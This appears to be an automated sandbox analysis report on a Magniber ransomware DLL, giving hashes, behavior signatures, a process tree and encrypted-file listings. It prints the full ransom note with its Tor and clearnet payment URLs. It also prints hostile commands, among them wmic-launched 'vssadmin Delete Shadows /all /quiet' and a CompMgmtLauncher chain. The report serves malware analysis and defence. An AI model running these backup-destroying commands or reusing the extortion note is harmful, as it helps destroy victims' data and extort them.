Analysis

  • max time kernel
    142s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    29-08-2021 11:34

General

  • Target

    2.dll

  • Size

    38KB

  • MD5

    af93e6f3ae4466cefe7aa27baedfec96

  • SHA1

    b6dc065d489b104c9aa08aacc6f97dd0b672d907

  • SHA256

    5cfd8fefb03c8b0417743f48b9c8ac041387b9f0d24e775d0917a4c7de41847d

  • SHA512

    43273b952f19d77499b5fce4f0c937e71017c56c133991832a1fa2a39151790e9161f794e4ea07776dc5a291f5c1d8a8d98b9c9ddcdce4c84a4de50346d1eef2

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://feb8c46022607eb03hramozl.755w262jegubyu4txxdvjupbul2uelswocczig2rw6ex2fhbguvlkfyd.onion/hramozl Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://feb8c46022607eb03hramozl.centone.top/hramozl http://feb8c46022607eb03hramozl.burybig.xyz/hramozl http://feb8c46022607eb03hramozl.dumpour.space/hramozl http://feb8c46022607eb03hramozl.joyfits.site/hramozl Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://feb8c46022607eb03hramozl.755w262jegubyu4txxdvjupbul2uelswocczig2rw6ex2fhbguvlkfyd.onion/hramozl

http://feb8c46022607eb03hramozl.centone.top/hramozl

http://feb8c46022607eb03hramozl.burybig.xyz/hramozl

http://feb8c46022607eb03hramozl.dumpour.space/hramozl

http://feb8c46022607eb03hramozl.joyfits.site/hramozl

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Process spawned unexpected child process 12 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies extensions of user files 9 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 8 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1224
    • C:\Windows\system32\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\2.dll,#1
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1996
      • C:\Windows\system32\wbem\wmic.exe
        C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
          PID:2504
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2516
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            4⤵
              PID:2564
        • C:\Windows\system32\wbem\wmic.exe
          C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
          2⤵
            PID:2852
          • C:\Windows\system32\cmd.exe
            cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
            2⤵
              PID:2864
              • C:\Windows\system32\wbem\WMIC.exe
                C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                3⤵
                  PID:2916
            • C:\Windows\system32\Dwm.exe
              "C:\Windows\system32\Dwm.exe"
              1⤵
              • Modifies extensions of user files
              • Modifies registry class
              • Suspicious use of WriteProcessMemory
              PID:1180
              • C:\Windows\system32\notepad.exe
                notepad.exe C:\Users\Public\readme.txt
                2⤵
                • Opens file in notepad (likely ransom note)
                PID:1660
              • C:\Windows\system32\cmd.exe
                cmd /c "start http://feb8c46022607eb03hramozl.centone.top/hramozl^&1^&39881967^&72^&315^&12"
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1964
                • C:\Program Files\Internet Explorer\iexplore.exe
                  "C:\Program Files\Internet Explorer\iexplore.exe" http://feb8c46022607eb03hramozl.centone.top/hramozl&1&39881967&72&315&12
                  3⤵
                  • Modifies Internet Explorer settings
                  • Suspicious behavior: GetForegroundWindowSpam
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:1384
                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1384 CREDAT:275457 /prefetch:2
                    4⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of SetWindowsHookEx
                    PID:240
              • C:\Windows\system32\wbem\wmic.exe
                C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
                2⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:240
              • C:\Windows\system32\cmd.exe
                cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1896
                • C:\Windows\system32\wbem\WMIC.exe
                  C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:916
            • C:\Windows\system32\taskhost.exe
              "taskhost.exe"
              1⤵
              • Modifies registry class
              • Suspicious use of WriteProcessMemory
              PID:1120
              • C:\Windows\system32\wbem\wmic.exe
                C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
                2⤵
                  PID:1684
                • C:\Windows\system32\cmd.exe
                  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:944
                  • C:\Windows\system32\wbem\WMIC.exe
                    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                    3⤵
                      PID:1788
                • C:\Windows\system32\cmd.exe
                  cmd /c CompMgmtLauncher.exe
                  1⤵
                  • Process spawned unexpected child process
                  • Suspicious use of WriteProcessMemory
                  PID:1776
                  • C:\Windows\system32\CompMgmtLauncher.exe
                    CompMgmtLauncher.exe
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1468
                    • C:\Windows\system32\wbem\wmic.exe
                      "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                      3⤵
                        PID:620
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Delete Shadows /all /quiet
                    1⤵
                    • Process spawned unexpected child process
                    • Interacts with shadow copies
                    PID:548
                  • C:\Windows\system32\vssvc.exe
                    C:\Windows\system32\vssvc.exe
                    1⤵
                      PID:1628
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin.exe Delete Shadows /all /quiet
                      1⤵
                      • Process spawned unexpected child process
                      • Interacts with shadow copies
                      PID:428
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin.exe Delete Shadows /all /quiet
                      1⤵
                      • Process spawned unexpected child process
                      • Interacts with shadow copies
                      PID:2096
                    • C:\Windows\system32\cmd.exe
                      cmd /c CompMgmtLauncher.exe
                      1⤵
                      • Process spawned unexpected child process
                      • Suspicious use of WriteProcessMemory
                      PID:2132
                      • C:\Windows\system32\CompMgmtLauncher.exe
                        CompMgmtLauncher.exe
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2188
                        • C:\Windows\system32\wbem\wmic.exe
                          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                          3⤵
                            PID:2236
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2288
                      • C:\Windows\system32\cmd.exe
                        cmd /c CompMgmtLauncher.exe
                        1⤵
                        • Process spawned unexpected child process
                        • Suspicious use of WriteProcessMemory
                        PID:2632
                        • C:\Windows\system32\CompMgmtLauncher.exe
                          CompMgmtLauncher.exe
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2680
                          • C:\Windows\system32\wbem\wmic.exe
                            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                            3⤵
                              PID:2744
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin.exe Delete Shadows /all /quiet
                          1⤵
                          • Process spawned unexpected child process
                          • Interacts with shadow copies
                          PID:2624
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin.exe Delete Shadows /all /quiet
                          1⤵
                          • Process spawned unexpected child process
                          • Interacts with shadow copies
                          PID:2796
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin.exe Delete Shadows /all /quiet
                          1⤵
                          • Process spawned unexpected child process
                          • Interacts with shadow copies
                          PID:2960
                        • C:\Windows\system32\cmd.exe
                          cmd /c CompMgmtLauncher.exe
                          1⤵
                          • Process spawned unexpected child process
                          PID:2984
                          • C:\Windows\system32\CompMgmtLauncher.exe
                            CompMgmtLauncher.exe
                            2⤵
                              PID:3036
                              • C:\Windows\system32\wbem\wmic.exe
                                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                3⤵
                                  PID:2076
                            • C:\Windows\system32\vssadmin.exe
                              vssadmin.exe Delete Shadows /all /quiet
                              1⤵
                              • Process spawned unexpected child process
                              • Interacts with shadow copies
                              PID:2156

                            Network

                            MITRE ATT&CK Enterprise v6

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\N3NWFRZY.txt

                              MD5

                              d0bd834b57e5155340299bb8a9379124

                              SHA1

                              1fa23745482366b6324dcb6406794b8363539652

                              SHA256

                              5e38888328694492c3644814844f185627d4495823473f47e3a6804e8b976c83

                              SHA512

                              cca4196e9f2cda2e95cfc5ede5a0b5457109fae1726140da665d2171ac450856c449797f4e82d779451508967c7a2230318e6252854286612e1aa499c85c5d08

                            • C:\Users\Admin\Desktop\CompleteStart.emf.hramozl

                              MD5

                              49c09189c8b9a40c0cd06070c7987163

                              SHA1

                              60360df43ac761b6c9563baa36463d477c971224

                              SHA256

                              3dfa1018ebcb881333be6e04390a3a1d2c08ecc035298391cb4a8828b310ce02

                              SHA512

                              a250b8453e996b6f40f3ae2e26ca33f523b0f65498b7578e5e321c920134a952a1f9e80f4e50a91a2afcb6d21f17c1ae868bf12ce488ff6975a1a57a923d5b20

                            • C:\Users\Admin\Desktop\ConvertToEnter.mov.hramozl

                              MD5

                              ecdb73e25e229cbe850901ae711a3d21

                              SHA1

                              194ef7994f296b883fbb9965e56d468f8f2996cb

                              SHA256

                              8db07ac9cb9eb38744b8fd042716062d95b4bc67322244a43105ae49d9347fd4

                              SHA512

                              18975d726447b36fe58194e302d506666c2441caabf0351a13eb94cfb1cff45e2779189a42f5108f6c1d994f9950bcead4e2ade31a5b175574fae2f3a1422edd

                            • C:\Users\Admin\Desktop\FormatConfirm.mov.hramozl

                              MD5

                              69adcf30bc63ba530a8baf5493c69fca

                              SHA1

                              185e925054325cf1262d38f3dce33fcaa42bf1d9

                              SHA256

                              ebfa2b40954ef33acfdd2afa8f368d769f7b94b01c44d61114c81828a287c5bf

                              SHA512

                              164373e964bab6f1ea440c6746ce5d413ddc4890b49f2fd8f9cf9dfc39680792d5fefcd4fa53c248eb5be2e1beebee951c1543babf1426c625c89571b886ad8b

                            • C:\Users\Admin\Desktop\MergeJoin.bmp.hramozl

                              MD5

                              a385126075442b6e773a25e78aed6609

                              SHA1

                              04ac9dfaa255255099241e217d104aa8a13b426a

                              SHA256

                              444816edd32d172f3e735ec160fea45d92f6ffcb596df14063e97408f300ddb5

                              SHA512

                              65811f063da6589b35809ef6f5232d04d37514335f29f04603f2c4f1297c26dda08c0f15fa15e1d26c6e90aed3290658df236ab17158dcc04827f732a238f528

                            • C:\Users\Admin\Desktop\MergeTest.svgz.hramozl

                              MD5

                              dbc047c4e0685333daaff838a3da24ff

                              SHA1

                              7bba7c40894b93bd78a8d91b2a6f19f3d274c177

                              SHA256

                              733d08197730e4ed96d6a2187ec5e747d9b087bba4d2ac754bf3efb05706943a

                              SHA512

                              c28132ad07babb968418754fc7fe08ccc9bd013a3f91d1dfe431abb86293ef23370e72702230ad34a8b63d3ceb7896abfcfa7378bd87bc510f4f6462ef079f24

                            • C:\Users\Admin\Desktop\NewConnect.nfo.hramozl

                              MD5

                              2fde7670016a1f3b89bdca61b2845539

                              SHA1

                              7679698710fe20cc75be0211e2a39d8e493f20f5

                              SHA256

                              4e4b730c0cec5f5c7142a71e34a7143d38e934ca2e20eaa9dc59a2297f424745

                              SHA512

                              b39a5a8807f1befe703c681c8820c0435e13fe539f1c5a127266ddb10fa5f42b04c2651b8249e5d3033fd3f0fe93da84970c23f471fe0adf49adce9d24909579

                            • C:\Users\Admin\Desktop\PopConfirm.pot.hramozl

                              MD5

                              a1084d5141301214f9244817a7bcf508

                              SHA1

                              75e6b4c197cb3e3f58733e3ff147c2d5390a2d2d

                              SHA256

                              89b1753b27c9db49ababbc6b8e9ca82e551379d3d2cc8a166362dcbd93aebf70

                              SHA512

                              1c9756e5d87c7c9480bee1fe41c18b32fb7a4a4db5e17c9ed75325cc2156b40f8f29a505584e00b2326c8e0a2761d82fa247091c2cc17543f60b318d84f2e427

                            • C:\Users\Admin\Desktop\PushRead.bmp.hramozl

                              MD5

                              1efcd953d2be1166c9c8d65cb6344f15

                              SHA1

                              a1db1204f03aede29b20c9dbf7484c92df2025fe

                              SHA256

                              dccc09b0cff51bfdf351f1ce0ebff2f086827a31f5dae166e3a5753b842f985f

                              SHA512

                              3b57bcaf622da5f94882d068b9bbc8d23cbdb6ea0eb9570c3cee0e7b18fd32bf99058c0f4684e2d0dae3152282db377d1e272c12fcc836db1f281550f5ab6a45

                            • C:\Users\Admin\Desktop\StepUninstall.jpg.hramozl

                              MD5

                              cf6c059d8be078e61d563b3ebe8b130a

                              SHA1

                              afe1cb4b190f26a3697f94a30b9c79ee62aaeeb9

                              SHA256

                              7abf0a90c0a0b15b496d0e9c16240910ede54280311cd4315b93319b1a874b9b

                              SHA512

                              bd24d659fa8769cfa611fed8ce9eabea48edb938ac4c20bdfa55c6c32d6bce65a54348ac635c0619dcaa769ed8fe8cc1672d87cfc583ededb0978d237d0f6a45

                            • C:\Users\Admin\Desktop\UnblockShow.xps.hramozl

                              MD5

                              251e216097691f598f4945dacd4c956a

                              SHA1

                              3469f6bbe34cdf4ec01165fc9246a603479cc123

                              SHA256

                              4f23faebe8bb6ea1374ffdf0cc72697dad6da67ed3c3cd98b4964ca8f7341a72

                              SHA512

                              e8465d5087247636e454dfb7f213bd914e6d38b33fb7f998cd69cc8af26b712b2f4a2bc9974400744a6a0c99293e74188b0c9f8e7508e968d2cee734733abc51

                            • C:\Users\Admin\Desktop\UpdateGet.xps.hramozl

                              MD5

                              ec2c4681960e9e90df54630111a02a87

                              SHA1

                              f89f2b81a12beb325d1bd228e2f24e8eb84f5ed7

                              SHA256

                              9b7e5e9051168545fded1b954cc9dae0e537eb85ca20e3b195c6e8c109f72160

                              SHA512

                              6597d39bc462ccec0ce13f9bd55a743f9e5c47878da0687266f99d91dc1aca9fb386e12fc93f1ea39e1d2210ee0001a8283b4dddddf59ca54b09f8f43454d348

                            • C:\Users\Admin\Desktop\readme.txt

                              MD5

                              e4987e04579a46d2d0328e33a801fc02

                              SHA1

                              1ce522b9ec2e3c999c82f22e6d3014e449d0753a

                              SHA256

                              3b17947880ef6ff26af68be719d5aa1b95a91d0914d0a78e88183b26048711f8

                              SHA512

                              f3217fda521839876d3a76b88d2b448c9b339ad4cc25c1a4dc713a14b1d0d93e99776cda5449d39a5f8829a45568b7f51ffc867394e3cf8248e5a774bcf18b6f

                            • C:\Users\Public\readme.txt

                              MD5

                              e4987e04579a46d2d0328e33a801fc02

                              SHA1

                              1ce522b9ec2e3c999c82f22e6d3014e449d0753a

                              SHA256

                              3b17947880ef6ff26af68be719d5aa1b95a91d0914d0a78e88183b26048711f8

                              SHA512

                              f3217fda521839876d3a76b88d2b448c9b339ad4cc25c1a4dc713a14b1d0d93e99776cda5449d39a5f8829a45568b7f51ffc867394e3cf8248e5a774bcf18b6f

                            • \??\PIPE\srvsvc

                              MD5

                              d41d8cd98f00b204e9800998ecf8427e

                              SHA1

                              da39a3ee5e6b4b0d3255bfef95601890afd80709

                              SHA256

                              e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                              SHA512

                              cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                            • memory/240-99-0x0000000000000000-mapping.dmp

                            • memory/240-79-0x0000000000000000-mapping.dmp

                            • memory/620-100-0x0000000000000000-mapping.dmp

                            • memory/916-82-0x0000000000000000-mapping.dmp

                            • memory/944-102-0x0000000000000000-mapping.dmp

                            • memory/1120-73-0x00000000002D0000-0x00000000002D5000-memory.dmp

                              Filesize

                              20KB

                            • memory/1224-60-0x00000000026F0000-0x0000000002700000-memory.dmp

                              Filesize

                              64KB

                            • memory/1384-83-0x0000000000000000-mapping.dmp

                            • memory/1468-97-0x0000000000000000-mapping.dmp

                            • memory/1660-75-0x0000000000000000-mapping.dmp

                            • memory/1660-76-0x000007FEFC051000-0x000007FEFC053000-memory.dmp

                              Filesize

                              8KB

                            • memory/1684-101-0x0000000000000000-mapping.dmp

                            • memory/1788-103-0x0000000000000000-mapping.dmp

                            • memory/1896-80-0x0000000000000000-mapping.dmp

                            • memory/1964-78-0x0000000000000000-mapping.dmp

                            • memory/1996-70-0x0000000000440000-0x0000000000441000-memory.dmp

                              Filesize

                              4KB

                            • memory/1996-71-0x0000000000450000-0x0000000000451000-memory.dmp

                              Filesize

                              4KB

                            • memory/1996-72-0x0000000000460000-0x0000000000461000-memory.dmp

                              Filesize

                              4KB

                            • memory/1996-67-0x00000000001E0000-0x00000000001E1000-memory.dmp

                              Filesize

                              4KB

                            • memory/1996-68-0x00000000001F0000-0x00000000001F1000-memory.dmp

                              Filesize

                              4KB

                            • memory/1996-66-0x00000000001D0000-0x00000000001D1000-memory.dmp

                              Filesize

                              4KB

                            • memory/1996-65-0x00000000001C0000-0x00000000001C1000-memory.dmp

                              Filesize

                              4KB

                            • memory/1996-64-0x00000000001B0000-0x00000000001B1000-memory.dmp

                              Filesize

                              4KB

                            • memory/1996-63-0x00000000001A0000-0x00000000001A1000-memory.dmp

                              Filesize

                              4KB

                            • memory/1996-62-0x0000000000190000-0x0000000000191000-memory.dmp

                              Filesize

                              4KB

                            • memory/1996-74-0x0000000003B20000-0x0000000003B21000-memory.dmp

                              Filesize

                              4KB

                            • memory/1996-109-0x0000000003B40000-0x0000000003B41000-memory.dmp

                              Filesize

                              4KB

                            • memory/1996-61-0x0000000001DA0000-0x0000000002019000-memory.dmp

                              Filesize

                              2.5MB

                            • memory/1996-69-0x0000000000430000-0x0000000000431000-memory.dmp

                              Filesize

                              4KB

                            • memory/2076-120-0x0000000000000000-mapping.dmp

                            • memory/2188-104-0x0000000000000000-mapping.dmp

                            • memory/2236-106-0x0000000000000000-mapping.dmp

                            • memory/2504-107-0x0000000000000000-mapping.dmp

                            • memory/2516-108-0x0000000000000000-mapping.dmp

                            • memory/2564-110-0x0000000000000000-mapping.dmp

                            • memory/2680-111-0x0000000000000000-mapping.dmp

                            • memory/2744-114-0x0000000000000000-mapping.dmp

                            • memory/2852-115-0x0000000000000000-mapping.dmp

                            • memory/2864-116-0x0000000000000000-mapping.dmp

                            • memory/2916-117-0x0000000000000000-mapping.dmp

                            • memory/3036-118-0x0000000000000000-mapping.dmp